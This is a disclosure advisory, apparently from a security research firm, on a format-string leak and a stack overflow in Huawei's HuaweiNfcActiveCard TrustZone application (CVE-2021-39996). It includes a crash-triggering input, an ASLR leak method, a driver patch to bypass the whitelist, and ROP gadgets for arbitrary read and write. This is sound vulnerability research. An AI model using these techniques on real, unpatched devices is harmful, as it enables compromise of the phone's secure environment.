impalabs space base graphics
Huawei TrustZone HuaweiNfcActiveCard Vulnerability
This advisory contains information about the following vulnerabilities:

The HuaweiNfcActiveCard TA conforms to the GlobalPlatform TEE Internal Core API. As such, it receives commands from a client application located in the normal world. These commands are handled by the TA_InvokeCommandEntryPoint function.

This TA implements 13 commands, but calling only CmdTeeHardwareSyncAidList (0x20002) is enough to trigger the vulnerabilities.

Information Leak in ParseAidList

There is an information leak in the ParseAidList function that can be used to leak the address of a buffer allocated on the stack. When combined with the second vulnerability, it can be used to obtain the TA base address. This information leak comes from a call to SLog in ParseAidList:

int ParseAidList() {
    char *list_elem;
    int list_elem_len;
    char stack_buf[0x1400];
    // [...]
    if (g_aidCount > 0) {
        for (list_elem = &g_aidList; ; list_elem += 0x100) {
            SLog("%s: ParseAidList Enter, g_aidList[%d]=%s\n", "[Trace]", index, list_elem);
            list_elem_len = strlen(list_elem);
            tmpCnt = SplitAidStrtok(stack_buf, list_elem, list_elem_len, ",");
            SLog("%s: ParseAidList Enter, tmpCnt=%d\n", "[Trace]", tmpCnt);
            if (tmpCnt < 2) {
                SLog("%s: ParseAidList : at least two property:type and aid\n", "[Error]");
            } else if (!strncmp(&stack_buf[0x100], "501", 3)) {
                // [...]
            }
            // [...] many more else ifs [...]
            else {
                SLog("%s: ParseAidList unknown card aidList=%s, type=%d\n", "[Error]", &stack_buf[0x100], stack_buf);
            }
            // [...]
        }
    }
    // [...]
}

Each list_elem in g_aidList is parsed using SplitAidStrtok which splits the string on the "," separator and puts the resulting substrings in the stack buffer stack_buf. The function expects 2 substrings, type and aid. If the aid, at offset 0x100 in the stack buffer, doesn't match any of the expected values ("501", etc.), it goes into the default case which calls SLog with the type and aid as arguments. But since the format specifier for aid is %d instead of %s, it will print the string address instead of the string itself:

[TA_HuaweiNfcActiveCard-1] [Error]: ParseAidList unknown card aidList=A, type=110212648

Buffer Overflow in SplitAidStrtok

There is a vulnerability in the SplitAidStrtok function allowing to write out of bounds of its first argument. Depending on where this function is called from, it can be used to write user-controlled data in the BSS, or more interestingly, on the stack. This buffer overflow comes from a lack of checking in the SplitAidStrtok function.

int SplitAidStrtok(char *out_list, char *aidList, int aidLen, const char *separator) {
    // [...]
    const char *list_elem;
    size_t list_elem_len;
    int next_elem_ptr;
    int count;
    int ptr;
    // [...]
    // sanity checks of the arguments
    list_elem = strtok_s(aidList, separator, &ptr);
    if (list_elem) {
        list_elem_len = strlen(list_elem);
        if (strncpy_s(out_list, 0x100, list_elem, list_elem_len))
            return 0xFFFF0006;
        next_elem_ptr = out_list + 0x100;
        count = 1;
        while (1) {
            list_elem = strtok_s(0, separator, &ptr);
            if (!list_elem)
                break;
            list_elem_len = strlen(list_elem);
            ++count;
            if (strncpy_s(next_elem_ptr, 0x100, list_elem, list_elem_len))
                return 0xFFFF0006;
            next_elem_ptr += 0x100;
        }
        return count;
    }
    // [...]
}

The function SplitAidStrtok calls strtok_s in a loop on the aidList string given as argument to retrieve the separator-separated substrings. For each of the substrings, it calls strncpy_s to copy it into out_list at an offset incremented by 0x100 each time.

For example, if aidList is "A,B,C", "A" will be copied to out_list+0x0, "B" to out_list+0x100 and "C" to out_list+0x200. But as you can see, there is no limit on the number of substrings that can be copied. That means that given a long enough aidList string, we can overflow the out_list buffer.

SplitAidStrtok is called at 2 places:

int GetAidList(const char *aidList, int aidLen) {
    // [...]
    g_aidCount = SplitAidStrtok(&g_aidList, aidList, aidLen, "|");
    // [...]
}

In GetAidList, it can be used to overflow the g_aidList buffer of size 0x1400 that is allocated in the BSS (the aidList argument is fully user-controlled).

int ParseAidList() {
    char stack_buf[0x1400];
    // [...]
    list_elem = &g_aidList;
    for (index = 0; index < g_aidCount; ++index) {
        list_elem_len = strlen(list_elem);
        tmpCnt = SplitAidStrtok(stack_buf, list_elem, list_elem_len, ",");
        // [...]
        list_elem += 0x100;
    }
}

In ParseAidList, it can be used to overflow the stack_buf buffer of size 0x1400 that is allocated on the stack (the list_elem argument is user-controlled but limited to 255 bytes).

unsigned int CmdTeeHardwareSyncAidList(void *session, unsigned int paramTypes, int *params) {
    // [...]
    // checking the parameters types
    // [...]
    buffer = params[0].memref.buffer;
    length = params[0].memref.length;
    WriteAidListToFile(buffer, length);
    GetAidList(buffer, length);
    ParseAidList();
}

The CmdTeeHardwareSyncAidList command expects a single parameter: an input buffer containing a single string. It will call the GetAidList function with this string. GetAidList will split it on "|" and store the substrings into the g_aidList global buffer. Then CmdTeeHardwareSyncAidList calls ParseAidList which splits each of the substrings in g_aidList on ",", puts the results in the stack buffer and processes them.

An example input string that triggers a crash is A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,A,AAAAAAAAAAAAAAAAAAAAAAAA:

[HM] ESR_EL1: 82000006, ELR_EL1: 41414140, FAR is not valid
[HM] TA_HuaweiNfcAct vm fault prefetch abort: 41414140
[HM] fault: 82000006 tcb cref 2200000028
[HM] Registers dump:
[HM] ----------
[HM] 32 bits userspace stack dump:
[HM] ----------
[HM] <ParseAidList>+0x384/0x41c
[HM] [ERROR][2171]vmem_as_ondemand_prepare failed
[HM] [ERROR][2496]process 2200000028 (tid: 40) data abort:
[HM] [ERROR][2498]Bad memory access on address: 0x41414140, fault_code: 0x82000006
[HM]
[HM] Dump task states for tcb
[HM] ----------
[HM]     name=[TA_HuaweiNfcAct] tid=40 is-idle=0 is-curr=0
[HM]     state=BLOCKED@MEMFAULT sched.pol=0 prio=46 queued=1
[HM]     aff[0]=ff
[HM]     flags=1000 smc-switch=0 ca=8625 prefer-ca=8625
[HM] Registers dump:
[HM] ----------
[HM] 32 bits userspace stack dump:
[HM] ----------
[HM] <ParseAidList>+0x384/0x41c
[HM] Dump task states END
[HM]
[HM] [TRACE][1212]pid=48 exit_status=130

While there are stack cookies in the trustlet, surprisingly there is none in the ParseAidList function. As evidenced above, it is possible to overwrite a return address on the stack, and we will now see how to exploit it.

Exploitation

Our Device Setup

The device we have developed an exploit for is a P40 Pro running the firmware update ELS-LGRP4-OVS_11.0.0.196. The trustlet binary MD5 checksum is as follows:

HWELS:/ ## md5sum /vendor/bin/5fce3ea5-fa71-4152-a30f-f46be8c924bf.sec
318662fa357d2701941706d775e1115f  /vendor/bin/5fce3ea5-fa71-4152-a30f-f46be8c924bf.sec

Huawei's TEE OS iTrustee implements a whitelist mechanism that only allows specific client applications (native binaries or APKs) to talk to a trusted application.

In our case, the HuaweiNfcActiveCard TA can only be called by 2 native binaries and an APK:

  • /vendor/bin/nfcgetcplc (uid 0);
  • /vendor/bin/hw/android.hardware.secure_element@1.0-service (uid 0 or 1068);
  • com.android.nfc (cert starting with c2851d1c).

The authentication mechanism is implemented in 3 parts:
- the teecd daemon, that implements the TEE Client API, checks which native binary/APK is talking to it and sends that information to the kernel driver;
- the kernel driver ensures that it is talking to teecd, and forwards the information it received to the TEE OS;
- the TEE OS verifies that the client application is in the TA's whitelist.

Since we did not want to bother with injecting code in one of these binaries, we chose to circumvent the authentication by patching the kernel driver to add the ability to impersonate any native binary/APK.

Leaking The ASLR Slide

To obtain the base address of the trustlet, the first step is to leak the address of stack_buf in ParseAidList. To do that we trigger the information leak presented in the previous section by sending an input string containing an unknown aid ("A,A" in the exploit).

The second step is to leak an address in the trustlet .text section. The stack layout around the stack_buf buffer, that we are able to overflow thanks to the second vulnerability, is as follows:

0x1A40 ┌────────────────┐
       │       LR     ──┼──► .text + 0x1364
0x1A3C ├────────────────┤
       │       R11      │
0x1A38 ├────────────────┤
       │       R7       │
0x1A34 ├────────────────┤
       │       R6     ──┼──► saved length
0x1A30 ├────────────────┤
       │       R5     ──┼──► saved buffer
0x1A2C ├────────────────┤
       │       R4       │
0x1A28 ├────────────────┤
       │                │
       │                │
       │                │
       │    stack_buf   │
       │                │
       │                │
       │                │
0x0628 └────────────────┘

The second dword after stack_buf is the value of the R5 register that was pushed at the beginning of ParseAidList. This value will be popped at the end of ParseAidList right before the execution returns to CmdTeeHardwareSyncAidList. In CmdTeeHardwareSyncAidList, the R5 register will then be used as argument to a call to SLog, with the format specifier %s, allowing us to leak the bytes at this address (up to the first null byte). Since we're interested in leaking a code address, we can chose to overwrite the saved R5 with the address of the LR saved when entering ParseAidList.

Arbitrary Read / Write

By overwriting the saved LR instead of the saved R5, we can execute different ROP chains that allow us to perform arbitrary reads and writes. In our ROP chains, we need to be careful not to overflow too many values on the stack, as we want to keep the saved registers of the previous stack frames, so that we can pop them back later. To that effect, we chose to stack pivot into the input buffer mapped from the normal world using the following gadgets:

pop {r11,pc}
---
sub sp, r11, #4
pop {r11,pc}

We obtained the input buffer address (0x70003000) empirically and using knowledge from past exploits.

The ROP chain for the arbitrary write is built around the following gadget:

str r3, [r4,#4]
sub sp, r11, #0xc
pop {r4,r5,r11,pc}

The ROP chain for the arbitrary read is more complex, as we could not find any gadget performing a load from a register inside the trustlet. Instead we decided to chain a call to WriteAidListToFile(src_addr, 4) with a call to ReadAidListFromFile(dst_addr, &{4}). This is effectively equivalent to a call to memcpy(dst_addr, src_addr, 4).

Because the first parameter is an input buffer and not an in-out buffer, it won't be copied back to the normal world by the TEEOS on return, so we can't use it to retrieve our value. What we chose to do instead is to write the value into the stack, pop it into a register with a gadget, and then move it into R0. This way, it will be the return code of the command.

In the exploit, we demonstrate our write primitive by writing to the .data section, and our read primitive by dumping the trustlet memory:

adb wait-for-device shell su root sh -c 0 "/data/local/tmp/ta_huaweinfcactivecard"
stack_leak_addr = 69ce628
code_leak_addr = 3ee0608
ta_base_addr = 3ede000
got_addr = 69c6000
bss_start = 12345678
bss_start = deadbeef
Trustlet memory dump:
0x03ede000: f0 4f 2d e9 54 c1 9f e5 20 b0 8d e2 84 d0 4d e2 .O-.T... .....M.
0x03ede010: 00 30 9c e5 00 00 51 e3 98 00 0b e5 28 30 0b e5 .0....Q.....(0..
0x03ede020: 49 00 00 0a 12 00 52 e3 3d 00 00 ca 30 31 9f e5 I.....R.=...01..
0x03ede030: c2 9f a0 e1 92 03 c3 e0 43 92 79 e0 21 00 00 4a ........C.y.!..J

Getting Code Execution

While it is not demonstrated in the exploit, gadgets in the shared libraries (libc_shared_a32.so, libtee_shared_a32.so, libvendor_shared_a32.so, etc.) can also be used since they are also mapped in the trustlet's address space. Their base address can be found by reading the content of the GOT.

For example, this could be used to make arbitrary syscalls and potentially further escalate privileges.

Affected Devices

We have verified that the vulnerability impacted the following device(s):

  • Kirin 990: P40 Pro (ELS)

Please note that other models might have been affected.

Patch

Name Severity CVE Patch
Buffer Overflow in SplitAidStrtok Critical CVE-2021-39996 December 2021

Timeline

  • Oct. 06, 2021 - A vulnerability report is sent to Huawei PSIRT.
  • Oct. 25, 2021 - Huawei PSIRT acknowledges the vulnerability report.
  • Dec. 01, 2021 - Huawei PSIRT states that these issues were fixed in the December 2021 update.
  • From Nov. 30, 2022 to Jul, 19 2023 - We exchange regularly about the release of our advisories.